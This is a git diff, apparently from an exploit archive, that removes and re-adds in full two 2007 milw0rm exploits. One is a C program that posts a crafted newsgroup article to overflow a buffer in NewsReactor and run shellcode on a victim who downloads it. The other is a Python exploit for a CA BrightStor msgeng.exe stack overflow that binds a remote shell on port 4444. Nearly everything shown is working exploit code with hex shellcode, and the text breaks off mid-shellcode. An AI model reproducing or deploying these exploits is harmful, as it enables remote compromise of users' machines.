- printf("[+] example:\n %s news.giganews.com -i user -p pass alt.binaries.dvdr boomboom superman\n",argv[0]);
- return 0;
- }
-
- if (strstr(argv[i],"-u")) {
- i++;
- user=argv[i];
- i++;
- }
- if (strstr(argv[i],"-p")) {
- i++;
- pass=argv[i];
- i++;
- }
- group=argv[i++];
- subject=argv[i++];
- author=argv[i];
-
- printf("%s \n%s \n%s \n",group,subject,author);
- if ((he=gethostbyname(argv[1])) == NULL) {
- printf("Failed\n[-] Could not init gethostbyname\n");
- return 1;
- }
- if ((nntpsock = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
- printf("Failed\n[-] Socket error\n");
- return 1;
- }
-
- sock_addr.sin_family = PF_INET;
- sock_addr.sin_port = htons(119);
- sock_addr.sin_addr = *((struct in_addr *)he->h_addr);
- memset(&(sock_addr.sin_zero), '\0', 8);
- if (connect(nntpsock, (struct sockaddr *)&sock_addr, sizeof(struct sockaddr)) == -1) {
- printf("[-] Unable to connect\n");
- return 1;
- }
- printf("[+] Connected to %s\n",argv[1]);
- memset(recvbuff,'\0',500);
- recv(nntpsock, recvbuff, 500, 0);
- printf("-> %s",recvbuff);
-
- if (user!=0) {
- memset(buffer,0,100);
- sprintf(buffer,authuser,user);
- send(nntpsock,buffer,strlen(buffer),0);
- printf("[+] USER %s\n",user);
- memset(recvbuff,'\0',500);
- recv(nntpsock, recvbuff, 500, 0);
- printf("-> %s",recvbuff);
- }
-
- if (pass!=0) {
- memset(buffer,0,100);
- sprintf(buffer,authpass,pass);
- send(nntpsock,buffer,strlen(buffer),0);
- printf("[+] PASS %s\n",pass);
- memset(recvbuff,'\0',500);
- recv(nntpsock, recvbuff, 500, 0);
- printf("-> %s",recvbuff);
- }
-
- send(nntpsock,"MODE READER\r\n",strlen("MODE READER\r\n"),0);
- printf("[+] MODE READER\n");
- memset(recvbuff,'\0',500);
- recv(nntpsock, recvbuff, 500, 0);
- printf("-> %s",recvbuff);
-
- send(nntpsock,"POST\r\n",strlen("POST\r\n"),0);
- printf("[+] POST\n");
- memset(recvbuff,'\0',500);
- recv(nntpsock, recvbuff, 500, 0);
- printf("-> %s",recvbuff);
-
-char header[]=
-"From: %s <%s@blabla.com>\r\n"
-"Newsgroups: %s\r\n"
-"Subject: %s (1/1) \r\n"
-"X-Newsreader: blabla\r\n\r\n";
-
-char fileheader[]="=ybegin part=1 line=128 size=127 name="
-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
-"AAAAAAAAAAAAAAAAAAAAAAA"
-"\xD6\xE6\xE3\x77" //jmp EDI in advapi32.dll XP SP2 FR.
-"\xD6\xE6\xE3\x77" //ugly but we don't know where we land...
-"\xD6\xE6\xE3\x77"
-"\xD6\xE6\xE3\x77"
-"\xD6\xE6\xE3\x77"
-"\xD6\xE6\xE3\x77"
-"\xD6\xE6\xE3\x77"
-"\xD6\xE6\xE3\x77"
-"\xD6\xE6\xE3\x77"
-"\xD6\xE6\xE3\x77"
-"\xD6\xE6\xE3\x77"
-"\xD6\xE6\xE3\x77"
-"\xD6\xE6\xE3\x77"
-"\xD6\xE6\xE3\x77"
-"\xD6\xE6\xE3\x77"
-"\xD6\xE6\xE3\x77"
-"\xD6\xE6\xE3\x77"
-"\xD6\xE6\xE3\x77"
-"\xD6\xE6\xE3\x77"
-"\xD6\xE6\xE3\x77"
-"\xD6\xE6\xE3\x77"
-"\xD6\xE6\xE3\x77"
-"\xD6\xE6\xE3\x77"
-"\xD6\xE6\xE3\x77"
-"\xD6\xE6\xE3\x77"
-"\xD6\xE6\xE3\x77"
-"AAAAAAAA"
-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
-"AAAAAAAA";
-
-char file[]="=ypart begin=1 end=127\r\n" //encoded file. Doesnt matter but works!
-"vkJmyvvsxoJkJno}J..J\\74n.ncJ.Q......7474....JWJ[X]]J........J^Y]74..JWJk.....J\\XZVJ.....J\\XZ74}..J....JdJp.....\r\n";
-char fileend[]="=yend size=127 part=1 pcrc32=d4f19f0f\r\n";
-char postend[]="\r\n.\r\n";
-
-
- memset(evilbuff,0,10000);
- sprintf(evilbuff,header,author,author,group,subject);
- printf("[+] Message header:\n%s",evilbuff);
- send(nntpsock,evilbuff,strlen(evilbuff),0);
- Sleep(100);
-
- memset(evilbuff,0,10000);
- memcpy(evilbuff,fileheader,strlen(fileheader));
- memcpy(evilbuff+strlen(fileheader),calcshellcode,strlen(calcshellcode));
- memcpy(evilbuff+strlen(fileheader)+strlen(calcshellcode),"\r\n\0",3);
- send(nntpsock,evilbuff,strlen(evilbuff),0);
- Sleep(100);
-
- send(nntpsock,file,strlen(file),0);
- Sleep(100);
- send(nntpsock,fileend,strlen(fileend),0);
- Sleep(100);
- send(nntpsock,postend,strlen(postend),0);
- Sleep(100);
-
- memset(recvbuff,'\0',500);
- recv(nntpsock, recvbuff, 500, 0);
- printf("-> %s",recvbuff);
-
- printf("[+] Article posted. Have fun\n");
- Sleep(1000);
- return 0;
-}
-
-// milw0rm.com [2007-03-12]
+/*********************************************************************************
+* NewsReactor 20070220 Article Grabbing Remote Buffer Overflow *
+* Exploit 2 *
+* *
+* *
+* Check the other advisory for technical details. *
+* *
+* This exploit connects to your newsgroups provider and posts a crafted article. *
+* *
+* Ask your victim to grab it to trigger the bug and execute calc.exe. *
+* Return address should work on XP SP2 FR. *
+* Should fail on english systems cause I took the first return address I got =D. *
+* Have Fun! *
+* *
+* Tested against WIN XP SP2 FR *
+* Coded and Discovered by Marsu *
+* *
+* Note: change evilbuff to crash News Bin Pro 4.32. 800 'A' should be enough. *
+*********************************************************************************/
+
+
+#include "winsock2.h"
+#include "stdio.h"
+#include "stdlib.h"
+#pragma comment(lib, "ws2_32.lib")
+
+
+/* win32_exec - EXITFUNC=process CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com */
+/* 0x00 0x0b 0x0c 0x0a 0x0d 0x0e 0x0f 0x09 0x20 0x22 0x7C */
+char calcshellcode[] =
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
+"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x34\x4e\x53\x4b\x58\x4e\x37"
+"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x48\x4f\x34\x4a\x51\x4b\x48"
+"\x4f\x55\x42\x52\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x58"
+"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"
+"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e"
+"\x46\x4f\x4b\x53\x46\x35\x46\x42\x46\x30\x45\x57\x45\x4e\x4b\x58"
+"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x44"
+"\x4b\x48\x4f\x55\x4e\x51\x41\x50\x4b\x4e\x4b\x48\x4e\x51\x4b\x48"
+"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x52\x46\x50\x43\x4c\x41\x43"
+"\x42\x4c\x46\x56\x4b\x48\x42\x34\x42\x53\x45\x48\x42\x4c\x4a\x47"
+"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x37\x4e\x51\x4d\x4a"
+"\x4b\x38\x4a\x46\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b"
+"\x42\x30\x42\x50\x42\x30\x4b\x48\x4a\x56\x4e\x53\x4f\x35\x41\x53"
+"\x48\x4f\x42\x46\x48\x35\x49\x58\x4a\x4f\x43\x48\x42\x4c\x4b\x37"
+"\x42\x35\x4a\x56\x50\x47\x4a\x4d\x44\x4e\x43\x57\x4a\x56\x4a\x59"
+"\x50\x4f\x4c\x58\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x56\x41\x56"
+"\x4e\x56\x43\x36\x50\x42\x45\x56\x4a\x47\x45\x36\x42\x30\x5a";
+
+int main(int argc, char* argv[])
+{
+ struct hostent *he;
+ struct sockaddr_in sock_addr;
+ WSADATA wsa;
+ int nntpsock;
+ char recvbuff[500];
+ char buffer[100];
+ char authuser[]="AUTHINFO USER %s\r\n";
+ char authpass[]="AUTHINFO PASS %s\r\n";
+ char evilbuff[10000];
+ char *user=0,*pass=0,*subject,*group,*author;
+ int i=2;
+
+ WSACleanup();
+ WSAStartup(MAKEWORD(2,0),&wsa);
+
+ if (argc<5) {
+ printf("[+] NewsReactor Article Grabbing Remote Buffer Overflow\n");
+ printf("[+] Coded and Discovered by Marsu \n");
+ printf("[+] Usage: %s Newsserver [-u User] [-p Pass] Group Subject Author\n",argv[0]);
+ printf("[+] example:\n %s news.giganews.com -i user -p pass alt.binaries.dvdr boomboom superman\n",argv[0]);
+ return 0;
+ }
+
+ if (strstr(argv[i],"-u")) {
+ i++;
+ user=argv[i];
+ i++;
+ }
+ if (strstr(argv[i],"-p")) {
+ i++;
+ pass=argv[i];
+ i++;
+ }
+ group=argv[i++];
+ subject=argv[i++];
+ author=argv[i];
+
+ printf("%s \n%s \n%s \n",group,subject,author);
+ if ((he=gethostbyname(argv[1])) == NULL) {
+ printf("Failed\n[-] Could not init gethostbyname\n");
+ return 1;
+ }
+ if ((nntpsock = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
+ printf("Failed\n[-] Socket error\n");
+ return 1;
+ }
+
+ sock_addr.sin_family = PF_INET;
+ sock_addr.sin_port = htons(119);
+ sock_addr.sin_addr = *((struct in_addr *)he->h_addr);
+ memset(&(sock_addr.sin_zero), '\0', 8);
+ if (connect(nntpsock, (struct sockaddr *)&sock_addr, sizeof(struct sockaddr)) == -1) {
+ printf("[-] Unable to connect\n");
+ return 1;
+ }
+ printf("[+] Connected to %s\n",argv[1]);
+ memset(recvbuff,'\0',500);
+ recv(nntpsock, recvbuff, 500, 0);
+ printf("-> %s",recvbuff);
+
+ if (user!=0) {
+ memset(buffer,0,100);
+ sprintf(buffer,authuser,user);
+ send(nntpsock,buffer,strlen(buffer),0);
+ printf("[+] USER %s\n",user);
+ memset(recvbuff,'\0',500);
+ recv(nntpsock, recvbuff, 500, 0);
+ printf("-> %s",recvbuff);
+ }
+
+ if (pass!=0) {
+ memset(buffer,0,100);
+ sprintf(buffer,authpass,pass);
+ send(nntpsock,buffer,strlen(buffer),0);
+ printf("[+] PASS %s\n",pass);
+ memset(recvbuff,'\0',500);
+ recv(nntpsock, recvbuff, 500, 0);
+ printf("-> %s",recvbuff);
+ }
+
+ send(nntpsock,"MODE READER\r\n",strlen("MODE READER\r\n"),0);
+ printf("[+] MODE READER\n");
+ memset(recvbuff,'\0',500);
+ recv(nntpsock, recvbuff, 500, 0);
+ printf("-> %s",recvbuff);
+
+ send(nntpsock,"POST\r\n",strlen("POST\r\n"),0);
+ printf("[+] POST\n");
+ memset(recvbuff,'\0',500);
+ recv(nntpsock, recvbuff, 500, 0);
+ printf("-> %s",recvbuff);
+
+char header[]=
+"From: %s <%s@blabla.com>\r\n"
+"Newsgroups: %s\r\n"
+"Subject: %s (1/1) \r\n"
+"X-Newsreader: blabla\r\n\r\n";
+
+char fileheader[]="=ybegin part=1 line=128 size=127 name="
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+"AAAAAAAAAAAAAAAAAAAAAAA"
+"\xD6\xE6\xE3\x77" //jmp EDI in advapi32.dll XP SP2 FR.
+"\xD6\xE6\xE3\x77" //ugly but we don't know where we land...
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77"
+"AAAAAAAA"
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+"AAAAAAAA";
+
+char file[]="=ypart begin=1 end=127\r\n" //encoded file. Doesnt matter but works!
+"vkJmyvvsxoJkJno}J..J\\74n.ncJ.Q......7474....JWJ[X]]J........J^Y]74..JWJk.....J\\XZVJ.....J\\XZ74}..J....JdJp.....\r\n";
+char fileend[]="=yend size=127 part=1 pcrc32=d4f19f0f\r\n";
+char postend[]="\r\n.\r\n";
+
+
+ memset(evilbuff,0,10000);
+ sprintf(evilbuff,header,author,author,group,subject);
+ printf("[+] Message header:\n%s",evilbuff);
+ send(nntpsock,evilbuff,strlen(evilbuff),0);
+ Sleep(100);
+
+ memset(evilbuff,0,10000);
+ memcpy(evilbuff,fileheader,strlen(fileheader));
+ memcpy(evilbuff+strlen(fileheader),calcshellcode,strlen(calcshellcode));
+ memcpy(evilbuff+strlen(fileheader)+strlen(calcshellcode),"\r\n\0",3);
+ send(nntpsock,evilbuff,strlen(evilbuff),0);
+ Sleep(100);
+
+ send(nntpsock,file,strlen(file),0);
+ Sleep(100);
+ send(nntpsock,fileend,strlen(fileend),0);
+ Sleep(100);
+ send(nntpsock,postend,strlen(postend),0);
+ Sleep(100);
+
+ memset(recvbuff,'\0',500);
+ recv(nntpsock, recvbuff, 500, 0);
+ printf("-> %s",recvbuff);
+
+ printf("[+] Article posted. Have fun\n");
+ Sleep(1000);
+ return 0;
+}
+
+// milw0rm.com [2007-03-12]
diff --git a/platforms/windows/remote/3495.txt b/platforms/windows/remote/3495.txt
index 6315bf979..ef31c2582 100755
--- a/platforms/windows/remote/3495.txt
+++ b/platforms/windows/remote/3495.txt 
@@ -1,120 +1,120 @@
-#!/usr/bin/python
-# This one was listed in the SANS TOP 20 and I needed an exploit for analysis.
-# I couldnt find a reliable exploit for my analysis and so came up with this.
-# Remote exploit for the CA BrightStor msgeng.exe service stack overflow
-# vulnerability as described in LS-20060330.pdf on lssec.com. The exploit was
-# tested on windows 2000 SP4 in a VMware environment.
-# Opens a shell on TCP port 4444.
-#
-# Though a stack overflow vulnerability caused due to strcpy, this vulnerability
-# provides an interesting case. Unlike a traditional stack overflow where the
-# user supplies the overflow data which immediately is copied into a stack
-# based buffer, here the user supplied data is stored in the heap and the first
-# DWORD of the RPC stub is used as the source address in the strcpy operation.
-# This means we have to locate the address of our shellcode on the heap and then
-# craft the first DWORD of the stub in such a way that when strcpy is called our
-# buffer is the source. I had problems locating the shellcode in the heap,
-# because each time I ran the exploit the shellcode would be in different places
-# , obviously (0008xxxx or 0009xxxx or 000Axxxx). However when sending very
-# large data of around 500000 bytes I saw that along with one of the likely
-# locations it was always available at the address 011E0070 aswell. Atleast on
-# the setup I have for analysis this address does not have anything useful if
-# buffer sizes of 1k, 2k etc are used. Once we get the address straight, there
-# after its a straight forward stack overflow that can overwrite EIP.
-#
-# This exploit binds shell to TCP port 4444 and connects to it
-#
-# Author shall bear no responsibility for any screw ups caused by using the code
-# Winny M Thomas ;-)
-
-from impacket.dcerpc import transport, dcerpc
-from impacket import uuid
-import struct
-import time
-import sys
-import os
-
-#alphanumeric portbind shellcode from metasploit. Binds shell to port 4444
-shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
-shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
-shellcode += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
-shellcode += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
-shellcode += "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
-shellcode += "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x58"
-shellcode += "\x4e\x56\x46\x42\x46\x42\x4b\x58\x45\x54\x4e\x53\x4b\x48\x4e\x57"
-shellcode += "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x44\x4a\x51\x4b\x38"
-shellcode += "\x4f\x55\x42\x32\x41\x50\x4b\x4e\x49\x44\x4b\x58\x46\x33\x4b\x58"
-shellcode += "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
-shellcode += "\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
-shellcode += "\x46\x4f\x4b\x53\x46\x35\x46\x52\x4a\x42\x45\x57\x45\x4e\x4b\x48"
-shellcode += "\x4f\x45\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x50\x4b\x54"
-shellcode += "\x4b\x48\x4f\x45\x4e\x41\x41\x30\x4b\x4e\x43\x30\x4e\x32\x4b\x58"
-shellcode += "\x49\x48\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c\x41\x53\x4b\x4d"
-shellcode += "\x46\x56\x4b\x38\x43\x54\x42\x43\x4b\x58\x42\x44\x4e\x30\x4b\x38"
-shellcode += "\x42\x47\x4e\x41\x4d\x4a\x4b\x58\x42\x44\x4a\x30\x50\x55\x4a\x56"
-shellcode += "\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x36"
-shellcode += "\x43\x45\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x46\x47\x37\x43\x57"
-shellcode += "\x44\x33\x4f\x35\x46\x35\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e"
-shellcode += "\x4e\x4f\x4b\x53\x42\x45\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e"
-shellcode += "\x48\x46\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x35\x4c\x36\x44\x30"
-shellcode += "\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x35"
-shellcode += "\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x55\x43\x45\x43\x35\x43\x34"
-shellcode += "\x43\x55\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x46\x4a\x36\x41\x41"
-shellcode += "\x4e\x45\x48\x36\x43\x45\x49\x58\x41\x4e\x45\x39\x4a\x56\x46\x4a"
-shellcode += "\x4c\x31\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x31"
-shellcode += "\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42"
-shellcode += "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x35\x4f\x4f\x42\x4d"
-shellcode += "\x4a\x36\x45\x4e\x49\x54\x48\x58\x49\x44\x47\x55\x4f\x4f\x48\x4d"
-shellcode += "\x42\x55\x46\x35\x46\x35\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x56"
-shellcode += "\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x45\x4f\x4f\x48\x4d\x45\x45"
-shellcode += "\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x56\x48\x36\x4a\x46\x43\x46"
-shellcode += "\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x35\x49\x55\x49\x52\x4e\x4c"
-shellcode += "\x49\x38\x47\x4e\x4c\x56\x46\x54\x49\x58\x44\x4e\x41\x53\x42\x4c"
-shellcode += "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x34\x4e\x32"
-shellcode += "\x43\x49\x4d\x48\x4c\x47\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36"
-shellcode += "\x44\x47\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x34\x4f\x4f"
-shellcode += "\x48\x4d\x4b\x45\x47\x55\x44\x55\x41\x45\x41\x35\x41\x55\x4c\x36"
-shellcode += "\x41\x30\x41\x35\x41\x55\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x56"
-shellcode += "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x56"
-shellcode += "\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f"
-shellcode += "\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d"
-shellcode += "\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x43\x55\x4f\x4f\x48\x4d"
-shellcode += "\x4f\x4f\x42\x4d\x5a\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
-
-def DCEconnectAndExploit(target):
- trans = transport.TCPTransport(target, 6503)
- trans.connect()
- dce = dcerpc.DCERPC_v5(trans)
- dce.bind(uuid.uuidtup_to_bin(('dc246bf0-7a7a-11ce-9f88-00805fe43838', '1.0')))
-
- # The following DWORD gets converted to an address pointing into our
- # buffer.
- request = struct.pack('\n' % sys.argv[0] - sys.exit(-1) - - DCEconnectAndExploit(target) - print 'Exploit sent to: %s' % target - print 'Connecting to %s:4444' % target - time.sleep(3) - ConnectRemoteShell(target) - -# milw0rm.com [2007-03-16] +#!/usr/bin/python +# This one was listed in the SANS TOP 20 and I needed an exploit for analysis. +# I couldnt find a reliable exploit for my analysis and so came up with this. +# Remote exploit for the CA BrightStor msgeng.exe service stack overflow +# vulnerability as described in LS-20060330.pdf on lssec.com. The exploit was +# tested on windows 2000 SP4 in a VMware environment. +# Opens a shell on TCP port 4444. +# +# Though a stack overflow vulnerability caused due to strcpy, this vulnerability +# provides an interesting case. Unlike a traditional stack overflow where the +# user supplies the overflow data which immediately is copied into a stack +# based buffer, here the user supplied data is stored in the heap and the first +# DWORD of the RPC stub is used as the source address in the strcpy operation. +# This means we have to locate the address of our shellcode on the heap and then +# craft the first DWORD of the stub in such a way that when strcpy is called our +# buffer is the source. I had problems locating the shellcode in the heap, +# because each time I ran the exploit the shellcode would be in different places +# , obviously (0008xxxx or 0009xxxx or 000Axxxx). However when sending very +# large data of around 500000 bytes I saw that along with one of the likely +# locations it was always available at the address 011E0070 aswell. Atleast on +# the setup I have for analysis this address does not have anything useful if +# buffer sizes of 1k, 2k etc are used. Once we get the address straight, there +# after its a straight forward stack overflow that can overwrite EIP. 
+#
+# This exploit binds shell to TCP port 4444 and connects to it
+#
+# Author shall bear no responsibility for any screw ups caused by using the code
+# Winny M Thomas ;-)
+
+from impacket.dcerpc import transport, dcerpc
+from impacket import uuid
+import struct
+import time
+import sys
+import os
+
+#alphanumeric portbind shellcode from metasploit. Binds shell to port 4444
+shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
+shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
+shellcode += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
+shellcode += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
+shellcode += "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
+shellcode += "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x58"
+shellcode += "\x4e\x56\x46\x42\x46\x42\x4b\x58\x45\x54\x4e\x53\x4b\x48\x4e\x57"
+shellcode += "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x44\x4a\x51\x4b\x38"
+shellcode += "\x4f\x55\x42\x32\x41\x50\x4b\x4e\x49\x44\x4b\x58\x46\x33\x4b\x58"
+shellcode += "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
+shellcode += "\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
+shellcode += "\x46\x4f\x4b\x53\x46\x35\x46\x52\x4a\x42\x45\x57\x45\x4e\x4b\x48"
+shellcode += "\x4f\x45\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x50\x4b\x54"
+shellcode += "\x4b\x48\x4f\x45\x4e\x41\x41\x30\x4b\x4e\x43\x30\x4e\x32\x4b\x58"
+shellcode += "\x49\x48\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c\x41\x53\x4b\x4d"
+shellcode += "\x46\x56\x4b\x38\x43\x54\x42\x43\x4b\x58\x42\x44\x4e\x30\x4b\x38"
+shellcode += "\x42\x47\x4e\x41\x4d\x4a\x4b\x58\x42\x44\x4a\x30\x50\x55\x4a\x56"
+shellcode += "\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x36"
+shellcode += "\x43\x45\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x46\x47\x37\x43\x57"
+shellcode += "\x44\x33\x4f\x35\x46\x35\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e"
+shellcode += "\x4e\x4f\x4b\x53\x42\x45\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e" +shellcode += "\x48\x46\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x35\x4c\x36\x44\x30" +shellcode += "\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x35" +shellcode += "\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x55\x43\x45\x43\x35\x43\x34" +shellcode += "\x43\x55\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x46\x4a\x36\x41\x41" +shellcode += "\x4e\x45\x48\x36\x43\x45\x49\x58\x41\x4e\x45\x39\x4a\x56\x46\x4a" +shellcode += "\x4c\x31\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x31" +shellcode += "\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42" +shellcode += "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x35\x4f\x4f\x42\x4d" +shellcode += "\x4a\x36\x45\x4e\x49\x54\x48\x58\x49\x44\x47\x55\x4f\x4f\x48\x4d" +shellcode += "\x42\x55\x46\x35\x46\x35\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x56" +shellcode += "\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x45\x4f\x4f\x48\x4d\x45\x45" +shellcode += "\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x56\x48\x36\x4a\x46\x43\x46" +shellcode += "\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x35\x49\x55\x49\x52\x4e\x4c" +shellcode += "\x49\x38\x47\x4e\x4c\x56\x46\x54\x49\x58\x44\x4e\x41\x53\x42\x4c" +shellcode += "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x34\x4e\x32" +shellcode += "\x43\x49\x4d\x48\x4c\x47\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36" +shellcode += "\x44\x47\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x34\x4f\x4f" +shellcode += "\x48\x4d\x4b\x45\x47\x55\x44\x55\x41\x45\x41\x35\x41\x55\x4c\x36" +shellcode += "\x41\x30\x41\x35\x41\x55\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x56" +shellcode += 